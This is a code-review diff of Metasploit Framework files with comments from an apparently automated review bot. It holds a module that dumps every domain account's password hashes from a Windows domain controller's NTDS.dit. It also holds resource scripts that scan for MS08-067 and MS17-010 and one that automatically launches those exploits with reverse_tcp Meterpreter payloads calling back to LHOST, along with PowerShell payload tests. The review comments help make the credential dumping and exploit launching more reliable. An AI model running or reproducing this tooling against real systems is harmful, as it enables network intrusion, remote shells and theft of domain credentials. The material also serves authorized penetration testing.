@@ -12,25 +12,35 @@ class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy include Msf::Post::File + include Msf::Post::Windows::ExtAPI - def initialize(info={}) - super(update_info(info, - 'Name' => 'Windows Domain Controller Hashdump', - 'Description' => %q{ + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Windows Domain Controller Hashdump', + 'Description' => %q( This module attempts to copy the NTDS.dit database from a live Domain Controller and then parse out all of the User Accounts. It saves all of the captured password hashes, including historical ones. - }, - 'License' => MSF_LICENSE, - 'Author' => ['theLightCosine'], - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ] - )) - deregister_options('SMBUser','SMBPass', 'SMBDomain') + ), + 'License' => MSF_LICENSE, + 'Author' => ['theLightCosine'], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + ) + ) + deregister_options('SMBUser', 'SMBPass', 'SMBDomain') + register_options( + [OptBool.new( + 'CLEANUP', [ true, 'Automatically delete ntds backup created', true] + )] + ) end def run if preconditions_met? + print_status "Pre-conditions met, attempting to copy NTDS.dit" ntds_file = copy_database_file unless ntds_file.nil? file_stat = client.fs.file.stat(ntds_file) 
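Review bot: The new `CLEANUP` option's description, `'Automatically delete ntds backup created'`, does not tell the operator what turning it off leaves behind: the copied NTDS.dit, which carries every domain account's password hashes, stays on the controller's filesystem until someone removes it by hand. A description along the lines of `'Delete the NTDS.dit copy from the target once parsed (disabling this leaves all domain hashes on disk)'` makes the trade-off visible in `show options`. The rest of the hunk is the rubocop-style reshuffle of `initialize` and needs nothing further.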
@@ -38,39 +48,52 @@ class MetasploitModule < Msf::Post print_status "Repairing NTDS database after copy..." print_status repair_ntds(ntds_file) realm = sysinfo["Domain"] - ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file) - print_status "Started up NTDS channel. Preparing to stream results..." - ntds_parser.each_account do |ad_account| - print_good ad_account.to_s - report_hash(ad_account.ntlm_hash.downcase, ad_account.name, realm) - ad_account.nt_history.each_with_index do |nt_hash, index| - hash_string = ad_account.lm_history[index] || Metasploit::Credential::NTLMHash::BLANK_LM_HASH - hash_string << ":#{nt_hash}" - report_hash(hash_string.downcase,ad_account.name, realm) + begin + ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file) + rescue Rex::Post::Meterpreter::RequestError => e + print_bad("Failed to properly parse database: #{e}") + if e.to_s.include? "1004" + print_bad("Error 1004 is likely a jet database error because the ntds database is not in the regular format") end end - print_status "Deleting backup of NTDS.dit at #{ntds_file}" - rm_f(ntds_file) + unless ntds_parser.nil? + print_status "Started up NTDS channel. Preparing to stream results..." 
+ ntds_parser.each_account do |ad_account| + print_good ad_account.to_s + report_hash(ad_account.ntlm_hash.downcase, ad_account.name, realm) + ad_account.nt_history.each_with_index do |nt_hash, index| + hash_string = ad_account.lm_history[index] || Metasploit::Credential::NTLMHash::BLANK_LM_HASH + hash_string << ":#{nt_hash}" + report_hash(hash_string.downcase, ad_account.name, realm) + end + end + end + if datastore['cleanup'] + print_status "Deleting backup of NTDS.dit at #{ntds_file}" + rm_f(ntds_file) + else + print_bad "#{ntds_file} requires manual cleanup" + end end end end def copy_database_file database_file_path = nil - if start_vss - case sysinfo["OS"] - when /2003| \.NET/ - database_file_path = vss_method - when /2008|2012/ - database_file_path = ntdsutil_method - else - print_error "This version of Windows is unsupported" - end + case sysinfo["OS"] + when /2003| \.NET/ + print_status "Using Volume Shadow Copy Method" + database_file_path = vss_method + when /2008|2012|2016/ + print_status "Using NTDSUTIL method" + database_file_path = ntdsutil_method + else + print_error "This version of Windows is unsupported" end database_file_path end - def is_domain_controller? + def domain_controller? if ntds_location file_exist?("#{ntds_location}\\ntds.dit") else 
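Review bot: The NTDS.dit backup is only removed when the streaming block finishes normally: an exception inside `ntds_parser.each_account`, or anything other than `Rex::Post::Meterpreter::RequestError` out of `Parser.new`, propagates past the `if datastore['cleanup']` branch and leaves a copy of the domain's password hashes in the temp directory without even the "requires manual cleanup" notice. Wrapping the parse-and-stream section in `begin … ensure` and putting the cleanup in the `ensure` bounds that exposure however parsing ends. Separately, the option is registered as `'CLEANUP'` in the initialize hunk while this hunk reads `datastore['cleanup']`; the datastore lookup is presumably case-insensitive, but `datastore['CLEANUP']` keeps the two spellings consistent. The `e.to_s.include? "1004"` test also matches any error text containing those digits, so if `RequestError` exposes the code as a field it would be the safer thing to compare — worth confirming. `run` begins before this hunk.
```ruby
        realm = sysinfo["Domain"]
        begin
          begin
            ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
          rescue Rex::Post::Meterpreter::RequestError => e
            # … unchanged: error reporting …
          end
          # … unchanged: each_account streaming and report_hash calls …
        ensure
          if datastore['CLEANUP']
            print_status "Deleting backup of NTDS.dit at #{ntds_file}"
            rm_f(ntds_file)
          else
            print_bad "#{ntds_file} requires manual cleanup"
          end
        end
```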
@@ -79,13 +102,13 @@ class MetasploitModule < Msf::Post end def ntds_location - @ntds_location ||= registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\services\\NTDS\\Parameters\\","DSA Working Directory") + @ntds_location ||= registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\services\\NTDS\\Parameters\\", "DSA Working Directory") end def ntdsutil_method - tmp_path = "#{get_env("%WINDIR%")}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8)+6))}" + tmp_path = "#{get_env('%WINDIR%')}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8) + 6))}" command_arguments = "\"activate instance ntds\" \"ifm\" \"Create Full #{tmp_path}\" quit quit" - result = cmd_exec("ntdsutil.exe", command_arguments,90) + result = cmd_exec("ntdsutil.exe", command_arguments, 90) if result.include? "IFM media created successfully" file_path = "#{tmp_path}\\Active Directory\\ntds.dit" print_status "NTDS database copied to #{file_path}" @@ -97,23 +120,27 @@ class MetasploitModule < Msf::Post file_path end - def preconditions_met? - unless is_admin? + if is_admin? + print_status "Session has Admin privs" + else print_error "This module requires Admin privs to run" return false end - unless is_domain_controller? + if domain_controller? + print_status "Session is on a Domain Controller" + else print_error "This does not appear to be an AD Domain Controller" return false end unless session_compat? return false end + load_extapi return true end - def repair_ntds(path='') + def repair_ntds(path = '') arguments = "/p /o \"#{path}\"" cmd_exec("esentutl", arguments) end 
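Review bot: `load_extapi` is called at the end of `preconditions_met?` but its result is thrown away, so if it reports failure by return value — the way the neighbouring `is_admin?` and `domain_controller?` checks do — the method still returns true and the NTDS channel work runs without the extension it was just added for. If that is its contract, `return false unless load_extapi` makes it a real precondition; if it raises on failure instead, a short comment saying so would stop the next reader asking the same question — confirm against `Msf::Post::Windows::ExtAPI`, which is outside this diff. Style: `unless session_compat? return false end` reads better as `return false unless session_compat?`, matching the guard-clause shape of the checks above it.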
@@ -144,13 +171,16 @@ class MetasploitModule < Msf::Post end def vss_method + unless start_vss + fail_with(Failure::NoAccess, "Unable to start VSS service") + end location = ntds_location.dup - volume = location.slice!(0,3) - id = create_shadowcopy("#{volume}") + volume = location.slice!(0, 3) + id = create_shadowcopy('#{volume}') print_status "Getting Details of ShadowCopy #{id}" sc_details = get_sc_details(id) sc_path = "#{sc_details['DeviceObject']}\\#{location}\\ntds.dit" - target_path = "#{get_env("%WINDIR%")}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8)+6))}" + target_path = "#{get_env('%WINDIR%')}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8) + 6))}" print_status "Moving ntds.dit to #{target_path}" move_file(sc_path, target_path) target_path diff --git a/scripts/meterpreter/search_dwld.rb b/scripts/meterpreter/search_dwld.rb index bfdfe212ae..a51eed05bb 100644 --- a/scripts/meterpreter/search_dwld.rb +++ b/scripts/meterpreter/search_dwld.rb @@ -91,7 +91,7 @@ filter = args[1] || "office" # Set the regexp if filter == 'free' if args[2].nil? - raise RuntimeError.new("free filter requires pattern argument") + raise "free filter requires pattern argument" end $motif = args[2] else @@ -99,7 +99,7 @@ else end if $motif.nil? - raise RuntimeError.new("Unrecognized filter") + raise "Unrecognized filter" end # Search and download diff --git a/scripts/resource/dev_checks.rc b/scripts/resource/dev_checks.rc new file mode 100644 index 0000000000..9cecf722d2 --- /dev/null +++ b/scripts/resource/dev_checks.rc 
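Review bot: `id = create_shadowcopy('#{volume}')` in `vss_method` now passes the literal nine characters `#{volume}` rather than the drive prefix: single-quoted Ruby strings do not interpolate, so this quote swap breaks the VSS path on every 2003-era target that reaches it, where the old double-quoted line worked. The interpolation was redundant anyway; `id = create_shadowcopy(volume)` is the correct form. The added `fail_with(Failure::NoAccess, ...)` guard is fine, but note it is the only place `start_vss` is now checked since the old `if start_vss` wrapper around `copy_database_file` was removed in the earlier hunk.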
@@ -0,0 +1,112 @@ + + +# +# This resource script will check for vulnerabilities related to +# programs and services used by developers, including the following: +# +# * NodeJS debug (multi/misc/nodejs_v8_debugger) +# * distcc (unix/misc/distcc_exe) +# * Jenkins (linux/misc/jenkins_java_deserialize) +# * GitHub Enterprise (linux/http/github_enterprise_secret) +# +# It is worth noting that ONLY CHECKS are performed, no active exploiting. +# This makes it safe to run in many environments. +# +# Authors: +# * pbarry-r7 +# * dmohanty-r7 +# + +@job_ids = [] + +def wait_until_jobs_done + loop do + @job_ids.each do |job_id| + current_job_ids = framework.jobs.keys.map { |e| e.to_i } + sleep 1 if current_job_ids.include?(job_id) + end + + return + end +end + +def run_scanner(host:, mod_name:) + begin + mod = framework.auxiliary.create(mod_name) + mod.datastore['RHOSTS'] = host.address + print_line("Running the #{mod.name}...") + result = mod.run_simple({'RunAsJob': true, 'LocalOutput': self.output}) + rescue ::Exception => e + print_error(e.message) + end +end + +def check_exploit(host:, mod_name:, vuln_check_ret_val:) + begin + mod = framework.exploits.create(mod_name) + mod.datastore['RHOST'] = host.address + print_line("Looking for #{mod.name}...") + result = mod.check_simple({'RunAsJob': true, 'LocalOutput': self.output}) + @job_ids << mod.job_id if mod.job_id + if vuln_check_ret_val.index(result) + print_line("HOST #{host.address} APPEARS VULNERABLE TO #{mod.name}") + framework.db.report_vuln( + workspace: mod.workspace, + host: mod.rhost, + name: mod.name, + info: "This was flagged as likely vulnerable by the explicit check of #{mod.fullname}.", + refs: mod.references + ) + end + rescue ::Exception => e + print_error(e.message) + end +end + +def setup + # Test and see if we have a database connected + if not (framework.db and framework.db.active) + print_error("Database connection isn't established") + return false + end + + run_single("setg verbose true") + + true 
+end + +def main + framework.db.workspace.hosts.each do |host| + print_line("Checking IP: #{host.address}, OS: #{host.os_name}...") + + # Modules + { 'multi/misc/nodejs_v8_debugger': [ Exploit::CheckCode::Appears ], + 'unix/misc/distcc_exec': [ Exploit::CheckCode::Vulnerable ], + 'unix/misc/qnx_qconn_exec': [ Exploit::CheckCode::Vulnerable ], + 'linux/misc/jenkins_java_deserialize': [ Exploit::CheckCode::Vulnerable ], + 'linux/http/github_enterprise_secret': [ Exploit::CheckCode::Vulnerable ], + 'multi/http/traq_plugin_exec': [ Exploit::CheckCode::Appears ], + 'multi/http/builderengine_upload_exec': [ Exploit::CheckCode::Appears ], + 'multi/http/mantisbt_php_exec': [ Exploit::CheckCode::Appears ], + 'multi/http/vbulletin_unserialize': [ Exploit::CheckCode::Appears ], + 'unix/webapp/vbulletin_vote_sqli_exec': [ Exploit::CheckCode::Appears ], + 'multi/misc/java_jmx_server': [ Exploit::CheckCode::Appears, + Exploit::CheckCode::Detected ] }.each do |mod,ret_val| + check_exploit(host: host, + mod_name: mod.to_s, + vuln_check_ret_val: ret_val) + end + + # Scanners + [ 'scanner/misc/java_rmi_server' ].each do |mod| + run_scanner(host: host, mod_name: mod.to_s) + end + end + + wait_until_jobs_done +end + +abort("Error during setup, exiting.") unless setup +main + + diff --git a/scripts/resource/smb_checks.rc b/scripts/resource/smb_checks.rc new file mode 100644 index 0000000000..ab2276f517 --- /dev/null +++ b/scripts/resource/smb_checks.rc 
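Review bot: `wait_until_jobs_done` does not wait: the `return` sits inside `loop do`, so after a single pass over `@job_ids` (sleeping at most one second per job still running) the method returns and `main` finishes while checks are still in flight, which means the last `report_vuln` calls may never happen before the resource script ends. Polling until none of the recorded job ids is still present fixes it. `run_scanner` also never appends `mod.job_id` to `@job_ids`, so scanner jobs are not tracked at all, and both handlers use `rescue ::Exception`, which also swallows `Interrupt` and `SystemExit`; `rescue StandardError => e` is what is meant. The same `wait_until_jobs_done` shape, the same `rescue ::Exception`, appear in `scripts/resource/smb_checks.rc` below.
```ruby
def wait_until_jobs_done
  loop do
    current_job_ids = framework.jobs.keys.map(&:to_i)
    return if (@job_ids & current_job_ids).empty?
    sleep 1
  end
end
```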
@@ -0,0 +1,108 @@
+
+
+#
+# This resource scripts will check common security concerns on SMB for Windows.
+# Specifically, this script will check for these things:
+#
+# * MS08-067.
+# * MS17-010.
+# * SMB version 1.
+#
+# For extra validation, you may try the smb_validate.rc script.
+#
+# Author:
+# sinn3r
+#
+
+@job_ids = []
+
+def wait_until_jobs_done
+ while true
+ @job_ids.each do |job_id|
+ current_job_ids = framework.jobs.keys.map { |e| e.to_i }
+ sleep 1 if current_job_ids.include?(job_id)
+ end
+
+ return
+ end
+end
+
+def check_ms17_010(host, serv)
+ print_status("Checking MS17-010 on #{host.address}")
+ mod = framework.modules.create('auxiliary/scanner/smb/smb_ms17_010')
+ mod.datastore['RHOSTS'] = host.address
+ mod.datastore['RPORT'] = serv.port
+ mod.run_simple({ 'RunAsJob' => true, 'LocalOutput' => self.output })
+ print_status("MS17-010 job ID for target #{host.address} is: #{mod.job_id}")
+ @job_ids << mod.job_id
+end
+
+def check_ms08_067_netapi(host, serv)
+ print_status("Checking MS08-067 on #{host.address}")
+ mod = framework.exploits.create('windows/smb/ms08_067_netapi')
+ mod.datastore['RHOST'] = host.address
+ begin
+ check_code = mod.check_simple({ 'RunAsJob' => true, 'LocalOutput' => self.output })
+ if mod.job_id
+ print_status("MS08-067 job ID for target #{host.address} is: #{mod.job_id}")
+ @job_ids << mod.job_id
+ end
+
+ if check_code == Msf::Exploit::CheckCode::Vulnerable
+ framework.db.report_vuln(
+ workspace: mod.workspace,
+ host: mod.rhost,
+ name: mod.name,
+ info: "This was flagged as vulnerable by the explicit check of #{mod.fullname}.",
+ refs: mod.references
+ )
+ end
+ rescue ::Exception => e
+ print_error(e.message)
+ end
+end
+
+def check_smbv1(host, serv)
+ print_status("Checking SMBv1 on #{host.address}")
+ mod = framework.modules.create('auxiliary/scanner/smb/smb1')
+ mod.datastore['RHOSTS'] = host.address
+ mod.datastore['RPORT'] = serv.port
+ mod.run_simple({ 'RunAsJob' => true, 'LocalOutput' => self.output })
+ print_status("SMBv1 check job ID for target #{host.address} is: #{mod.job_id}")
+ @job_ids << mod.job_id
+end
+
+def is_smb?(host, serv)
+ return false unless serv.host
+ return false if serv.state != Msf::ServiceState::Open
+ return false if serv.port != 445
+ true
+end
+
+def do_checks
+ print_status("Number of hosts to check: #{framework.db.workspace.hosts.length}")
+ framework.db.workspace.hosts.each do |host|
+ host.services.each do |serv|
+ next unless is_smb?(host, serv)
+ print_status("Checking #{host.address}:#{serv.port} (#{serv.name})")
+ check_smbv1(host, serv)
+ check_ms17_010(host, serv)
+ check_ms08_067_netapi(host, serv)
+ end
+ end
+end
+
+def setup
+ run_single("setg verbose true")
+end
+
+def main
+ print_status('Performing checks...')
+ do_checks
+ wait_until_jobs_done
+end
+
+setup
+main
+
+
\ No newline at end of file
diff --git a/scripts/resource/smb_validate.rc b/scripts/resource/smb_validate.rc
new file mode 100644
index 0000000000..1df6c51c23
--- /dev/null
+++ b/scripts/resource/smb_validate.rc
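Review bot: `check_ms17_010` and `check_smbv1` append `mod.job_id` to `@job_ids` unconditionally, whereas `check_ms08_067_netapi` guards with `if mod.job_id`; when `run_simple` does not produce a job the array receives a `nil` entry and the "job ID ... is:" status line prints an empty value. Use the same guard in both helpers, `@job_ids << mod.job_id if mod.job_id`, and print the status line inside that guard. `is_smb?` never reads its `host` parameter, and `rescue ::Exception` in `check_ms08_067_netapi` should be `rescue StandardError`. The first header line, "This resource scripts will check", should read "This resource script will check".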
@@ -0,0 +1,157 @@
+
+
+#
+# This resource script will attempt to exploit the following vulnerabilities:
+#
+# * MS08-067
+# * MS17-010
+#
+# It works best if you can pair it with the smb_checks.rc script.
+#
+# Author:
+# sinn3r
+#
+
+@job_ids = []
+
+def wait_until_jobs_done
+ while true
+ @job_ids.each do |job_id|
+ current_job_ids = framework.jobs.keys.map { |e| e.to_i }
+ sleep 1 if current_job_ids.include?(job_id)
+ end
+
+ return
+ end
+end
+
+def ms08_067_netapi_mod
+ framework.exploits.create('windows/smb/ms08_067_netapi')
+end
+
+def ms17_010_mod
+ framework.exploits.create('windows/smb/ms17_010_eternalblue')
+end
+
+def is_port_open?(port)
+ begin
+ sock = Socket.new(Socket::Constants::AF_INET, Socket::Constants::SOCK_STREAM, 0)
+ sock.bind(Socket.pack_sockaddr_in(port, get_lhost))
+ rescue
+ return false
+ ensure
+ sock.close if sock && sock.kind_of?(Socket)
+ end
+
+ true
+end
+
+def get_x86_meterpreter_port
+ port_range = (4000..65535)
+ port_range.each do |port|
+ return port if is_port_open?(port)
+ end
+
+ raise RuntimeError, 'Unable to find a meterpreter port'
+end
+
+def get_x64_meterpreter_port
+ port_range = (3000..65535)
+ port_range.each do |port|
+ return port if is_port_open?(port)
+ end
+
+ raise RuntimeError, 'Unable to find a meterpreter port'
+end
+
+def get_x86_payload_name
+ 'windows/meterpreter/reverse_tcp'
+end
+
+def get_x64_payload_name
+ 'windows/x64/meterpreter/reverse_tcp'
+end
+
+def get_lhost
+ framework.datastore['LHOST']
+end
+
+def validate_ms08_067(vuln)
+ mod = ms08_067_netapi_mod
+ mod.datastore['RHOST'] = vuln.host.address
+ mod.datastore['RPORT'] = vuln.service ? vuln.service.port : 445
+ mod.datastore['PAYLOAD'] = get_x86_payload_name
+ mod.datastore['LHOST'] = get_lhost
+ mod.datastore['LPORT'] = get_x86_meterpreter_port
+ print_status("Validating MS08-067 on #{mod.datastore['RHOST']}:#{mod.datastore['RPORT']} with #{mod.datastore['PAYLOAD']} on port #{mod.datastore['LPORT']}")
+ begin
+ mod.exploit_simple({
+ 'LocalOutput' => self.output,
+ 'RunAsJob' => true,
+ 'Payload' => get_x86_payload_name
+ })
+ @job_ids << mod.job_id
+ rescue ::Exception => e
+ print_error(e.message)
+ end
+end
+
+def validate_ms17_010(vuln)
+ mod = ms17_010_mod
+ mod.datastore['RHOST'] = vuln.host.address
+ mod.datastore['RPORT'] = vuln.service ? vuln.service.port : 445
+ mod.datastore['PAYLOAD'] = get_x64_payload_name
+ mod.datastore['LHOST'] = get_lhost
+ mod.datastore['LPORT'] = get_x64_meterpreter_port
+ print_status("Validating MS17-010 on #{mod.datastore['RHOST']}:#{mod.datastore['RPORT']} with #{mod.datastore['PAYLOAD']} on port #{mod.datastore['LPORT']}")
+ begin
+ mod.exploit_simple({
+ 'LocalOutput' => self.output,
+ 'RunAsJob' => true,
+ 'Payload' => get_x64_payload_name
+ })
+ @job_ids << mod.job_id
+ rescue ::Exception => e
+ print_error(e.message)
+ end
+end
+
+def is_smb?(host, serv)
+ return false unless serv.host
+ return false if serv.state != Msf::ServiceState::Open
+ return false if serv.port != 445
+ true
+end
+
+def do_validation
+ framework.db.workspace.vulns.each do |vuln|
+ case vuln.name
+ when /MS17\-010/i
+ validate_ms17_010(vuln)
+ when /MS08\-067/i
+ validate_ms08_067(vuln)
+ end
+ end
+end
+
+def setup
+ run_single("setg verbose true")
+end
+
+def main
+ if framework.datastore['LHOST']
+ print_status('Performing validation...')
+ begin
+ do_validation
+ wait_until_jobs_done
+ rescue RuntimeError => e
+ print_error(e.message)
+ print_error("Unable to do validation")
+ end
+ end
+end
+
+setup
+main
+
+
\ No newline at end of file
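Review bot: `main` exits silently when `framework.datastore['LHOST']` is unset, so a run without a global LHOST produces no output and the operator has no indication why nothing happened; an `else` branch with `print_error('LHOST is not set; set it globally before running this script')` makes the precondition visible. `get_x86_meterpreter_port` and `get_x64_meterpreter_port` are the same search differing only in the range start and could be one helper that takes the range. `is_port_open?` actually tests whether the local port can be bound, so a name such as `local_port_free?` would read correctly, and its bare `rescue` hides the reason a bind failed. Because each call returns the first free port and the exploits run as background jobs, two vulns processed in succession may be handed the same LPORT if the first handler has not bound yet — worth confirming against how `exploit_simple` starts the handler. `is_smb?` is defined but never called in this script.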
diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb
index 402ee98d67..ef6b4ca487 100644
--- a/spec/lib/msf/core/exploit/powershell_spec.rb
+++ b/spec/lib/msf/core/exploit/powershell_spec.rb
@@ -276,11 +276,13 @@ RSpec.describe Msf::Exploit::Powershell do
 end
 it 'shouldnt shorten args' do
 code = subject.cmd_psh_payload(payload, arch)
- expect(code.include?('-NoProfile -WindowStyle hidden -Command')).to be_truthy
+ expect(code.include?('-NoProfile ')).to be_truthy
+ expect(code.include?('-WindowStyle hidden')).to be_truthy
+ expect(code.include?('-Command ')).to be_truthy
 end
 it 'should include -NoExit' do
 code = subject.cmd_psh_payload(payload, arch)
- expect(code.include?('-NoProfile -WindowStyle hidden -NoExit -Command')).to be_truthy
+ expect(code.include?('-NoExit ')).to be_truthy
 end
 end
@@ -311,14 +313,9 @@ RSpec.describe Msf::Exploit::Powershell do
 subject.datastore['Powershell::method'] = 'msil'
 subject.options.validate(subject.datastore)
 end
- it 'should raise an exception' do
- except = false
- begin
- subject.cmd_psh_payload(payload, arch)
- rescue RuntimeError
- except = true
- end
- expect(except).to be_truthy
+ it 'should generate a command line' do
+ code = subject.cmd_psh_payload(payload, arch)
+ expect(decompress(code).include?('System.Reflection.MethodInfo')).to be_truthy
 end
 end
@@ -394,10 +391,10 @@ RSpec.describe Msf::Exploit::Powershell do
 end
 end
- context 'when use single quotes' do
- it 'should wrap in single quotes' do
- code = subject.cmd_psh_payload(payload, arch, {:use_single_quotes => true})
- expect(code.include?(' -c \'')).to be_truthy
+ context 'when wrap double quotes' do
+ it 'should wrap in double quotes' do
+ code = subject.cmd_psh_payload(payload, arch, {:wrap_double_quotes => true})
+ expect(code.include?(' -c "')).to be_truthy
 end
 end
 end
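Review bot: The rewritten 'shouldnt shorten args' expectations check `-NoProfile `, `-WindowStyle hidden` and `-Command ` independently, which no longer verifies that the three flags appear together or in that order; if the order of the generated command line matters, a single `expect(code).to match(/-NoProfile .*-WindowStyle hidden .*-Command /)` would keep that guarantee without pinning the exact spacing. In the third hunk the `use_single_quotes` case is replaced rather than joined by the `wrap_double_quotes` case, so if `cmd_psh_payload` still accepts that option (not visible here) it has lost its only test. The `decompress` helper used in the second hunk is not visible in this diff and is presumably defined elsewhere in the spec.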
@@ -447,7 +444,8 @@ RSpec.describe Msf::Exploit::Powershell do
 [:sta, true],
 [:noprofile, true],
 [:windowstyle, "hidden"],
- [:command, "Z"]
+ [:command, "Z"],
+ [:wrap_double_quotes, true]
 ]
 permutations = (0..command_args.length).to_a.combination(2).map{|i,j| command_args[i...j]}
@@ -462,20 +460,21 @@ RSpec.describe Msf::Exploit::Powershell do
 opts[:shorten] = false
 long_args = subject.generate_psh_args(opts)
- opt_length = opts.length - 1
-
 expect(short_args).not_to be_nil
 expect(long_args).not_to be_nil
- expect(short_args.count('-')).to eql opt_length
- expect(long_args.count('-')).to eql opt_length
 expect(short_args[0]).not_to eql " "
 expect(long_args[0]).not_to eql " "
 expect(short_args[-1]).not_to eql " "
 expect(long_args[-1]).not_to eql " "
 if opts[:command]
- expect(long_args[-10..-1]).to eql "-Command Z"
- expect(short_args[-4..-1]).to eql "-c Z"
+ if opts[:wrap_double_quotes]
+ expect(long_args[-12..-1]).to eql "-Command \"Z\""
+ expect(short_args[-6..-1]).to eql "-c \"Z\""
+ else
+ expect(long_args[-10..-1]).to eql "-Command Z"
+ expect(short_args[-4..-1]).to eql "-c Z"
+ end
 end
 end
 end
diff --git a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
index d62f208a17..7bccc9b9cc 100644
--- a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
+++ b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
@@ -125,6 +125,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
 " -a,--add Add the hosts instead of searching",
 " -d,--delete Delete the hosts instead of searching",
 " -c Only show the given columns (see list below)",
+ " -C Only show the given columns until the next restart (see list below)",
 " -h,--help Show this help information",
 " -u,--up Only show hosts which are up",
 " -o Send output to a file in csv format",
diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
index 5fc0730837..04eb3245c4 100644
--- a/spec/modules/payloads_spec.rb
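Review bot: Dropping `opt_length` and the two `count('-')` expectations in the second hunk removes the only check that each option contributes exactly one flag to the generated argument string; the new branch only inspects the tail of the string, and only when `opts[:command]` is set. Since `:wrap_double_quotes` does not add a flag of its own, the check could be kept as `opt_length = opts.reject { |k, _| k == :wrap_double_quotes }.length - 1` followed by the original two `count('-')` assertions, provided that arithmetic still holds for the permutations built above the hunk. The enclosing `it` block and the construction of `opts` start outside the hunk.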
+++ b/spec/modules/payloads_spec.rb
@@ -2370,6 +2370,16 @@ RSpec.describe 'modules/payloads', :content do
 reference_name: 'python/meterpreter_reverse_tcp'
 end
+ context 'python/shell_bind_tcp' do
+ it_should_behave_like 'payload cached size is consistent',
+ ancestor_reference_names: [
+ 'singles/python/shell_bind_tcp'
+ ],
+ dynamic_size: false,
+ modules_pathname: modules_pathname,
+ reference_name: 'python/shell_bind_tcp'
+ end
+
 context 'python/shell_reverse_tcp' do
 it_should_behave_like 'payload cached size is consistent',
 ancestor_reference_names: [
@@ -4374,6 +4384,36 @@ RSpec.describe 'modules/payloads', :content do
 reference_name: 'linux/ppc/meterpreter_reverse_https'
 end
+ context 'linux/ppce500v2/meterpreter_reverse_http' do
+ it_should_behave_like 'payload cached size is consistent',
+ ancestor_reference_names: [
+ 'singles/linux/ppce500v2/meterpreter_reverse_http'
+ ],
+ dynamic_size: false,
+ modules_pathname: modules_pathname,
+ reference_name: 'linux/ppce500v2/meterpreter_reverse_http'
+ end
+
+ context 'linux/ppce500v2/meterpreter_reverse_https' do
+ it_should_behave_like 'payload cached size is consistent',
+ ancestor_reference_names: [
+ 'singles/linux/ppce500v2/meterpreter_reverse_https'
+ ],
+ dynamic_size: false,
+ modules_pathname: modules_pathname,
+ reference_name: 'linux/ppce500v2/meterpreter_reverse_https'
+ end
+
+ context 'linux/ppce500v2/meterpreter_reverse_tcp' do
+ it_should_behave_like 'payload cached size is consistent',
+ ancestor_reference_names: [
+ 'singles/linux/ppce500v2/meterpreter_reverse_tcp'
+ ],
+ dynamic_size: false,
+ modules_pathname: modules_pathname,
+ reference_name: 'linux/ppce500v2/meterpreter_reverse_tcp'
+ end
+
 context 'linux/ppc64le/meterpreter_reverse_http' do
 it_should_behave_like 'payload cached size is consistent',
 ancestor_reference_names: [
diff --git a/spec/spec_helper.rb b/spec/spec_helper.rb
index 0859ab6424..a5b1cfc002 100644
--- a/spec/spec_helper.rb
+++ b/spec/spec_helper.rb
@@ -3,10 +3,6 @@ require 'stringio'
 ENV['RAILS_ENV'] = 'test'
-unless Bundler.settings.without.include?(:coverage)
- require 'simplecov'
-end
-
 # @note must be before loading config/environment because railtie needs to be loaded before
 # `Metasploit::Framework::Application.initialize!` is called.
 #
diff --git a/tools/modules/generate_mettle_payloads.rb b/tools/modules/generate_mettle_payloads.rb
index 967a051b81..3e3c627562 100755
--- a/tools/modules/generate_mettle_payloads.rb
+++ b/tools/modules/generate_mettle_payloads.rb
@@ -12,18 +12,19 @@ schemes = [
 ]
 arches = [
- ['aarch64','Linux', 'aarch64-linux-musl'],
- ['armbe', 'Linux', 'armv5b-linux-musleabi'],
- ['armle', 'Linux', 'armv5l-linux-musleabi'],
- ['mips64', 'Linux', 'mips64-linux-muslsf'],
- ['mipsbe', 'Linux', 'mips-linux-muslsf'],
- ['mipsle', 'Linux', 'mipsel-linux-muslsf'],
- ['ppc', 'Linux', 'powerpc-linux-muslsf'],
- ['ppc64le','Linux', 'powerpc64le-linux-musl'],
- ['x64', 'Linux', 'x86_64-linux-musl'],
- ['x86', 'Linux', 'i486-linux-musl'],
- ['zarch', 'Linux', 's390x-linux-musl'],
- ['x64', 'OSX', 'x86_64-apple-darwin'],
+ ['aarch64', 'Linux', 'aarch64-linux-musl'],
+ ['armbe', 'Linux', 'armv5b-linux-musleabi'],
+ ['armle', 'Linux', 'armv5l-linux-musleabi'],
+ ['mips64', 'Linux', 'mips64-linux-muslsf'],
+ ['mipsbe', 'Linux', 'mips-linux-muslsf'],
+ ['mipsle', 'Linux', 'mipsel-linux-muslsf'],
+ ['ppc', 'Linux', 'powerpc-linux-muslsf'],
+ ['ppce500v2', 'Linux', 'powerpc-e500v2-linux-musl'],
+ ['ppc64le', 'Linux', 'powerpc64le-linux-musl'],
+ ['x64', 'Linux', 'x86_64-linux-musl'],
+ ['x86', 'Linux', 'i486-linux-musl'],
+ ['zarch', 'Linux', 's390x-linux-musl'],
+ ['x64', 'OSX', 'x86_64-apple-darwin'],
 ]
 arch = ''